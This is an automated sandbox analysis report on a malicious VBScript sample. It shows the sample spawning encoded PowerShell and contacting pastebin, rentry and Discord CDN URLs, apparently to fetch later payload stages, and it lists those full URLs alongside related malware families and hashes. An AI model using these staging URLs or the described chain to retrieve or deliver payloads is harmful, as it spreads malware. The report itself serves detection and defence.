            Process Injection            		1
            Masquerading            		OS Credential Dumping1
            Security Software Discovery            		Remote Services12
            Archive Collected Data            		1
            Web Service            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Exploitation for Client Execution            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		31
            Virtualization/Sandbox Evasion            		LSASS Memory1
            Process Discovery            		Remote Desktop ProtocolData from Removable Media11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts3
            PowerShell            		Logon Script (Windows)Logon Script (Windows)11
            Process Injection            		Security Account Manager31
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive1
            Ingress Tool Transfer            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Deobfuscate/Decode Files or Information            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
            Obfuscated Files or Information            		LSA Secrets1
            Remote System Discovery            		SSHKeylogging13
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Software Packing            		Cached Domain Credentials1
            System Network Configuration Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading            		DCSync1
            File and Directory Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem12
            System Information Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1545854 Sample: segura.vbs Startdate: 31/10/2024 Architecture: WINDOWS Score: 100 30 pastebin.com 2->30 32 cdn.discordapp.com 2->32 34 rentry.org 2->34 46 Suricata IDS alerts for network traffic 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 Yara detected UAC Bypass using CMSTP 2->50 54 14 other signatures 2->54 9 wscript.exe 1 2->9         started        signatures3 52 Connects to a pastebin service (likely for C&C) 30->52 process4 signatures5 56 Suspicious powershell command line found 9->56 58 Wscript starts Powershell (via cmd or directly) 9->58 60 Windows Scripting host queries suspicious COM object (likely to drop second stage) 9->60 62 Suspicious execution chain found 9->62 12 powershell.exe 7 9->12         started        process6 signatures7 64 Suspicious powershell command line found 12->64 66 Encrypted powershell cmdline option found 12->66 68 Uses ping.exe to check the status of other devices and networks 12->68 70 Found suspicious powershell code related to unpacking or dynamic code loading 12->70 15 powershell.exe 14 17 12->15         started        19 conhost.exe 12->19         started        process8 dnsIp9 40 pastebin.com 104.20.3.235, 443, 49709, 49738 CLOUDFLARENETUS United States 15->40 42 cdn.discordapp.com 162.159.135.233, 443, 49756 CLOUDFLARENETUS United States 15->42 44 Encrypted powershell cmdline option found 15->44 21 PING.EXE 1 15->21         started        24 powershell.exe 15 15->24         started        26 cmd.exe 1 15->26         started        28 5 other processes 15->28 signatures10 process11 dnsIp12 36 127.0.0.1 unknown unknown 21->36 38 rentry.org 164.132.58.105, 443, 49712, 49744 OVHFR France 24->38

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            No Antivirus matches

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            https://go.micro0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://www.microsoft.0%URL Reputationsafe
            https://aka.ms/pscore60%URL Reputationsafe
            http://geoplugin.net/json.gp/C0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            https://aka.ms/pscore680%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            rentry.org
            		164.132.58.105
            		truefalse
              		unknown
              cdn.discordapp.com
              		162.159.135.233
              		truetrue
                		unknown
                pastebin.com
                		104.20.3.235
                		truetrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://rentry.org/vsm4ofxs/rawfalse
                    		unknown
                    https://pastebin.com/raw/J6uRjZrvtrue
                      		unknown
                      https://cdn.discordapp.com/attachments/1187381098527858721/1299360122446807113/este2.txt?ex=6723826a&is=672230ea&hm=1e5ddde8edfd2b0b55a1936b9b2cf98999ca75e818b8e4dadd7bc75ebedbbd24&true
                        		unknown
                        https://rentry.org/shqm6g9p/rawfalse
                          		unknown
                          https://pastebin.com/raw/4B83LcVUfalse
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2353954151.000002306145D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2217928363.0000020D019C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2230796347.0000020D1007A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2230796347.0000020D101B0000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.2217928363.0000020D0022D000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.2217928363.0000020D0022D000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              https://go.micropowershell.exe, 00000004.00000002.2309229890.000002305242C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2217928363.0000020D01471000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://rentry.orgpowershell.exe, 00000004.00000002.2309229890.0000023053104000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2309229890.000002305196F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2217928363.0000020D016B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                https://pastebin.com/rawpowershell.exe, 00000004.00000002.2309229890.000002305304C000.00000004.00000800.00020000.00000000.sdmptrue
                                  		unknown
                                  https://rentry.org/shqm6g9p/rawPpowershell.exe, 00000004.00000002.2309229890.0000023053104000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://contoso.com/Licensepowershell.exe, 00000007.00000002.2230796347.0000020D101B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://contoso.com/Iconpowershell.exe, 00000007.00000002.2230796347.0000020D101B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.microsoft.powershell.exe, 00000004.00000002.2373219888.0000023069B0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://aka.ms/pscore6powershell.exe, 00000002.00000002.2387245646.0000028351B8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://cdn.discordapp.compowershell.exe, 00000004.00000002.2309229890.00000230519AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://crl.mS%F-sEpowershell.exe, 00000002.00000002.2385225983.00000283519AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.2217928363.0000020D0022D000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://rentry.orgpowershell.exe, 00000004.00000002.2309229890.0000023053104000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2217928363.0000020D01949000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://geoplugin.net/json.gp/Cpowershell.exe, 00000004.00000002.2353954151.000002306145D000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://cdn.discordapp.compowershell.exe, 00000004.00000002.2309229890.00000230519B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://contoso.com/powershell.exe, 00000007.00000002.2230796347.0000020D101B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.2353954151.000002306145D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2217928363.0000020D019C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2230796347.0000020D1007A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2230796347.0000020D101B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://rentry.org/vsm4ofxs/rawppowershell.exe, 00000007.00000002.2217928363.0000020D01471000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://go.microsoft.coapowershell.exe, 00000004.00000002.2373219888.0000023069AD0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://aka.ms/pscore68powershell.exe, 00000002.00000002.2387245646.0000028351BA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2309229890.00000230513F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2217928363.0000020D00001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  HTTPS://CDN.DISCORDAPP.COM/ATTACHMENTS/1187381098527858721/1299360122446807113/ESTE2.TXT?EX=6723826Apowershell.exe, 00000004.00000002.2309229890.00000230519AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2387245646.0000028351BD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2309229890.00000230513F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2217928363.0000020D00001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://pastebin.compowershell.exe, 00000004.00000002.2309229890.000002305309D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2309229890.0000023052A16000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://pastebin.compowershell.exe, 00000004.00000002.2309229890.000002305304C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2309229890.00000230517B8000.00000004.00000800.00020000.00000000.sdmptrue
                                                        		unknown
                                                        https://cdn.discordapp.com/attachments/1187381098527858721/1299360122446807113/este2.txt?ex=6723826apowershell.exe, 00000004.00000002.2309229890.00000230519AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          104.20.3.235
                                                          		pastebin.comUnited States
                                                          		13335CLOUDFLARENETUStrue
                                                          164.132.58.105
                                                          		rentry.orgFrance
                                                          		16276OVHFRfalse
                                                          162.159.135.233
                                                          		cdn.discordapp.comUnited States
                                                          		13335CLOUDFLARENETUStrue

                                                          Private

                                                          IP
                                                          127.0.0.1

                                                          General Information

                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1545854
                                                          Start date and time:2024-10-31 07:42:09 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 6m 5s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:16
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:segura.vbs
                                                          Detection:MAL
                                                          Classification:mal100.troj.expl.evad.winVBS@22/9@3/4
                                                          EGA Information:Failed
                                                          HCA Information:
                                                          • Successful, ratio: 76%
                                                          • Number of executed functions: 14
                                                          • Number of non-executed functions: 4
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .vbs

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                          • Execution Graph export aborted for target powershell.exe, PID 1816 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 3460 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 4952 because it is empty
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • VT rate limit hit for: segura.vbs

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          02:43:02API Interceptor87x Sleep call for process: powershell.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          104.20.3.235cr_asm3.ps1Get hashmaliciousUnknownBrowse
                                                          • pastebin.com/raw/sA04Mwk2
                                                          gabe.ps1Get hashmaliciousUnknownBrowse
                                                          • pastebin.com/raw/sA04Mwk2
                                                          cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                          • pastebin.com/raw/sA04Mwk2
                                                          cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                          • pastebin.com/raw/sA04Mwk2
                                                          vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                          • pastebin.com/raw/sA04Mwk2
                                                          OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                          • pastebin.com/raw/sA04Mwk2
                                                          5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                                          • pastebin.com/raw/sA04Mwk2
                                                          Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                          • pastebin.com/raw/sA04Mwk2
                                                          BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                          • pastebin.com/raw/sA04Mwk2
                                                          sostener.vbsGet hashmaliciousNjratBrowse
                                                          • pastebin.com/raw/V9y5Q5vv
                                                          164.132.58.105asegurar.vbsGet hashmaliciousRemcosBrowse
                                                            XS_Trade_AI-newest_release_.exeGet hashmaliciousLummaCBrowse
                                                              sims-4-updater-v1.3.4.exeGet hashmaliciousUnknownBrowse
                                                                Reduser.exeGet hashmaliciousBabadeda, RedLineBrowse
                                                                  setup.exeGet hashmaliciousBabadeda, RHADAMANTHYS, RedLineBrowse
                                                                    8MO5hfPa8d.exeGet hashmaliciousAsyncRAT, Clipboard HijackerBrowse
                                                                      SecuriteInfo.com.HEUR.Trojan.MSIL.Agent.gen.12009.5536.exeGet hashmaliciousAsyncRAT, Clipboard HijackerBrowse
                                                                        DLL_Injector_Resou_nls..scr.exeGet hashmaliciousAsyncRAT, Clipboard Hijacker, zgRATBrowse
                                                                          SynapseX_injector.exeGet hashmaliciousPython Stealer, MicroClipBrowse
                                                                            2PKbNS1Q41.exeGet hashmaliciousPython StealerBrowse
                                                                              162.159.135.233Cheat.Lab.2.7.2.msiGet hashmaliciousRedLineBrowse
                                                                              • cdn.discordapp.com/attachments/1166694393298817025/1171047481182793729/2.txt
                                                                              #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeGet hashmaliciousUnknownBrowse
                                                                              • cdn.discordapp.com/attachments/1161633037004587060/1161731056462995496/lient.exe
                                                                              QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, AveMariaBrowse
                                                                              • cdn.discordapp.com/attachments/1152164172566630421/1153190859320328273/Vvdsupbjet.exe
                                                                              We7WnoqeXe.exeGet hashmaliciousAmadey RedLineBrowse
                                                                              • cdn.discordapp.com/attachments/878034206570209333/908097655173947432/slhost.exe
                                                                              mosoxxxHack.exeGet hashmaliciousAmadey RedLineBrowse
                                                                              • cdn.discordapp.com/attachments/710557342755848243/876828681815871488/clp.exe
                                                                              Sales-contract-deaho-180521-poweruae.docGet hashmaliciousUnknownBrowse
                                                                              • cdn.discordapp.com/attachments/843685789120331799/844316591284944986/poiu.exe
                                                                              PURCHASE ORDER E3007921.EXEGet hashmaliciousSnake KeyloggerBrowse
                                                                              • cdn.discordapp.com/attachments/809311531652087809/839820005927550996/Youngest_Snake.exe
                                                                              Waybill Document 22700456.exeGet hashmaliciousNanocoreBrowse
                                                                              • cdn.discordapp.com/attachments/809311531652087809/839856358152208434/May_Blessing.exe
                                                                              COMPANY REQUIREMENT.docGet hashmaliciousSnake KeyloggerBrowse
                                                                              • cdn.discordapp.com/attachments/819674896988242004/819677189900861500/harcout.exe

                                                                              Domains

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              rentry.orgasegurar.vbsGet hashmaliciousRemcosBrowse
                                                                              • 164.132.58.105
                                                                              XS_Trade_AI-newest_release_.exeGet hashmaliciousLummaCBrowse
                                                                              • 164.132.58.105
                                                                              sims-4-updater-v1.3.4.exeGet hashmaliciousUnknownBrowse
                                                                              • 164.132.58.105
                                                                              Reduser.exeGet hashmaliciousBabadeda, RedLineBrowse
                                                                              • 164.132.58.105
                                                                              AtlasLoader.exeGet hashmaliciousUnknownBrowse
                                                                              • 198.251.88.130
                                                                              AtlasLoader.exeGet hashmaliciousUnknownBrowse
                                                                              • 198.251.88.130
                                                                              LX.exeGet hashmaliciousUnknownBrowse
                                                                              • 198.251.88.130
                                                                              lucim.exeGet hashmaliciousXmrigBrowse
                                                                              • 198.251.88.130
                                                                              Activator.exeGet hashmaliciousXmrigBrowse
                                                                              • 198.251.88.130
                                                                              EzLoader.exeGet hashmaliciousRHADAMANTHYS, XmrigBrowse
                                                                              • 198.251.88.130
                                                                              pastebin.comasegurar.vbsGet hashmaliciousRemcosBrowse
                                                                              • 104.20.3.235
                                                                              SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exeGet hashmaliciousXmrigBrowse
                                                                              • 104.20.4.235
                                                                              seethebestthingstobegetmebackwithherlove.htaGet hashmaliciousCobalt StrikeBrowse
                                                                              • 172.67.19.24
                                                                              BL Packing List & Invoice.xlsGet hashmaliciousUnknownBrowse
                                                                              • 104.20.4.235
                                                                              DHLShippingInvoicesAwbBL000000000102220242247.vbsGet hashmaliciousRemcosBrowse
                                                                              • 104.20.4.235
                                                                              a1OueQJq4d.exeGet hashmaliciousDCRatBrowse
                                                                              • 172.67.19.24
                                                                              4b7b5bc7b0d1f70adf6b80390f1273723c409b837c957.dllGet hashmaliciousUnknownBrowse
                                                                              • 104.20.4.235
                                                                              loader.exeGet hashmaliciousXmrigBrowse
                                                                              • 104.20.4.235
                                                                              SecuriteInfo.com.Win64.Evo-gen.31489.1077.exeGet hashmaliciousXmrigBrowse
                                                                              • 172.67.19.24
                                                                              6TCmDl2rFY.exeGet hashmaliciousDCRatBrowse
                                                                              • 104.20.4.235
                                                                              cdn.discordapp.comfile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                              • 162.159.129.233
                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Quasar, StealcBrowse
                                                                              • 162.159.134.233
                                                                              LDlanZur0i.exeGet hashmaliciousUnknownBrowse
                                                                              • 162.159.135.233
                                                                              Fa1QSXjTZD.exeGet hashmaliciousUnknownBrowse
                                                                              • 162.159.133.233
                                                                              xxImTScxAq.exeGet hashmaliciousUnknownBrowse
                                                                              • 162.159.135.233
                                                                              FvmhkYIi5P.exeGet hashmaliciousUnknownBrowse
                                                                              • 162.159.134.233
                                                                              FvmhkYIi5P.exeGet hashmaliciousUnknownBrowse
                                                                              • 162.159.135.233
                                                                              EUOgPjsBTC.exeGet hashmaliciousUnknownBrowse
                                                                              • 162.159.135.233
                                                                              https://cdn.discordapp.com/attachments/1238968627324125338/1296061386824093747/shortlist.zip?ex=6710eaba&is=670f993a&hm=26822365df14863bfea627ad912a327a69fb54ae8b0d7ba1003822b35800c605&Get hashmaliciousUnknownBrowse
                                                                              • 162.159.129.233
                                                                              https://cdn.discordapp.com/attachments/1238968627324125338/1296061386824093747/shortlist.zip?ex=6710eaba&is=670f993a&hm=26822365df14863bfea627ad912a327a69fb54ae8b0d7ba1003822b35800c605&Get hashmaliciousUnknownBrowse
                                                                              • 162.159.130.233

                                                                              ASNs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              CLOUDFLARENETUSasegurar.vbsGet hashmaliciousRemcosBrowse
                                                                              • 188.114.97.3
                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                              • 188.114.96.3
                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                              • 188.114.97.3
                                                                              A & C Metrology OC 545714677889Materiale.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                              • 104.21.74.191
                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                              • 188.114.97.3
                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake StealerBrowse
                                                                              • 188.114.96.3
                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                              • 188.114.97.3
                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, WhiteSnake StealerBrowse
                                                                              • 188.114.96.3
                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                              • 172.64.41.3
                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XmrigBrowse
                                                                              • 188.114.97.3
                                                                              OVHFRasegurar.vbsGet hashmaliciousRemcosBrowse
                                                                              • 164.132.58.105
                                                                              file.exeGet hashmaliciousXmrigBrowse
                                                                              • 51.79.145.202
                                                                              https://www.mediafire.com/file/oyfycncwen0a3ue/DSP_Plan_Set.zip/fileGet hashmaliciousUnknownBrowse
                                                                              • 51.75.86.98
                                                                              http://199.59.243.227Get hashmaliciousHTMLPhisherBrowse
                                                                              • 51.75.86.98
                                                                              https://gthr.uk/e8c3Get hashmaliciousUnknownBrowse
                                                                              • 51.89.232.103
                                                                              20241029_163818.jpgGet hashmaliciousUnknownBrowse
                                                                              • 51.89.232.103
                                                                              jew.arm.elfGet hashmaliciousUnknownBrowse
                                                                              • 144.217.222.207
                                                                              jew.ppc.elfGet hashmaliciousMiraiBrowse
                                                                              • 37.59.96.120
                                                                              ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                                              • 51.81.194.202
                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Quasar, StealcBrowse
                                                                              • 147.135.36.89
                                                                              CLOUDFLARENETUSasegurar.vbsGet hashmaliciousRemcosBrowse
                                                                              • 188.114.97.3
                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                              • 188.114.96.3
                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                              • 188.114.97.3
                                                                              A & C Metrology OC 545714677889Materiale.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                              • 104.21.74.191
                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                              • 188.114.97.3
                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake StealerBrowse
                                                                              • 188.114.96.3
                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                              • 188.114.97.3
                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, WhiteSnake StealerBrowse
                                                                              • 188.114.96.3
                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                              • 172.64.41.3
                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XmrigBrowse
                                                                              • 188.114.97.3

                                                                              JA3 Fingerprints

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              3b5074b1b5d032e5620f69f9f700ff0easegurar.vbsGet hashmaliciousRemcosBrowse
                                                                              • 104.20.3.235
                                                                              • 164.132.58.105
                                                                              • 162.159.135.233
                                                                              nOrden_de_Compra___0001245.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                              • 104.20.3.235
                                                                              • 164.132.58.105
                                                                              • 162.159.135.233
                                                                              file.exeGet hashmaliciousStealcBrowse
                                                                              • 104.20.3.235
                                                                              • 164.132.58.105
                                                                              • 162.159.135.233
                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                              • 104.20.3.235
                                                                              • 164.132.58.105
                                                                              • 162.159.135.233
                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                              • 104.20.3.235
                                                                              • 164.132.58.105
                                                                              • 162.159.135.233
                                                                              Paiement.emlGet hashmaliciousHTMLPhisherBrowse
                                                                              • 104.20.3.235
                                                                              • 164.132.58.105
                                                                              • 162.159.135.233
                                                                              PO 4500580954.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                              • 104.20.3.235
                                                                              • 164.132.58.105
                                                                              • 162.159.135.233
                                                                              CPYEzG7VGh.exeGet hashmaliciousDCRatBrowse
                                                                              • 104.20.3.235
                                                                              • 164.132.58.105
                                                                              • 162.159.135.233
                                                                              https://jpm-ghana-2024-election-conversation-with-oct-24.open-exchange.net/join-the-call?ml_access_token=eyJjb250ZW50Ijp7ImV4cGlyYXRpb25EYXRlIjoiMjAyNC0xMC0zMVQxNToyMDo1OS4wMDZaIiwiZW1haWwiOiJyZGVpdHpAdnItY2FwaXRhbC5jb20iLCJldmVudElkIjo0MjY3Mn0sInNpZ25hdHVyZSI6Ik1FVUNJQzhaMDJJblVZd0syUk9WRkdjL1pMNHRBbWo4RmwxdW9mQjhwZzRmSjZsMkFpRUE5d25HUFFoa3ZrdkM2MlJkQ3lkM09YbnFJZ0xlQTAwMDIxNlRWbG9Hb0ZjPSJ9Get hashmaliciousUnknownBrowse
                                                                              • 104.20.3.235
                                                                              • 164.132.58.105
                                                                              • 162.159.135.233
                                                                              SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 104.20.3.235
                                                                              • 164.132.58.105
                                                                              • 162.159.135.233

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):11608
                                                                              Entropy (8bit):4.890472898059848
                                                                              Encrypted:false
                                                                              SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                              MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                              SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                              SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                              SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                              Malicious:false
